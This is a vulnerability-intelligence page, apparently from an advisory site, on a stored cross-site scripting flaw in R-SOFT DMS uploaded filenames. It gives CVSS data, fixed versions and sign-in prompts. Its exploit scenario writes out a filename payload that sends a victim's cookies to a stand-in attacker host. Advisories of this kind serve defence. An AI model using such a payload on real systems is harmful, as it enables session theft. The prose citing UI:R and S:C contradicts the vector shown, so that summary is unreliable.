Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Authenticated low-privilege attacker (PR:L), passive victim must view the affected page (UI:R), stored XSS crosses into victim browser session constituting scope change (S:C), with limited confidentiality and integrity impact.
Primary rating from Vendor (cert).
CVSS VectorVendor: cert
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
1DescriptionCVE.org
R-SOFT DMS is vulnerable to Stored XSS in file upload functionality. Authenticated attacker can inject arbitrary HTML and JS into the name of the file being uploaded, which will be executed when visiting file list or upload status by other users.
This issue was fixed in version v3.19-2832 and v3.17-2580.
AnalysisAI
Stored XSS in R-SOFT DMS file upload functionality allows authenticated attackers to embed arbitrary HTML and JavaScript within uploaded filenames, which subsequently execute in the browsers of any user viewing the file list or upload status pages. The vulnerability affects the document management system's filename rendering pipeline, which fails to sanitize input before output into HTML context. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The attacker must hold a valid, authenticated account in the R-SOFT DMS with sufficient permissions to upload files (CVSS PR:L). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 base score of 5.1 (Medium) is consistent with the real-world risk profile. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated attacker with a low-privilege DMS account uploads a file whose name contains a crafted JavaScript payload (e.g., a filename such as report<script>document.location='https://attacker.tld/?c='+document.cookie</script>.pdf). When any other DMS user subsequently visits the file list or upload status page, the unsanitized filename is rendered into the HTML response and the script executes in the victim's browser, enabling session cookie theft or other client-side attacks. … |
| Remediation | Upgrade R-SOFT DMS to version v3.19-2832 (on the 3.19 branch) or v3.17-2580 (on the 3.17 branch), as confirmed in the CVE description. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42854
GHSA-c9ph-5j66-3j9f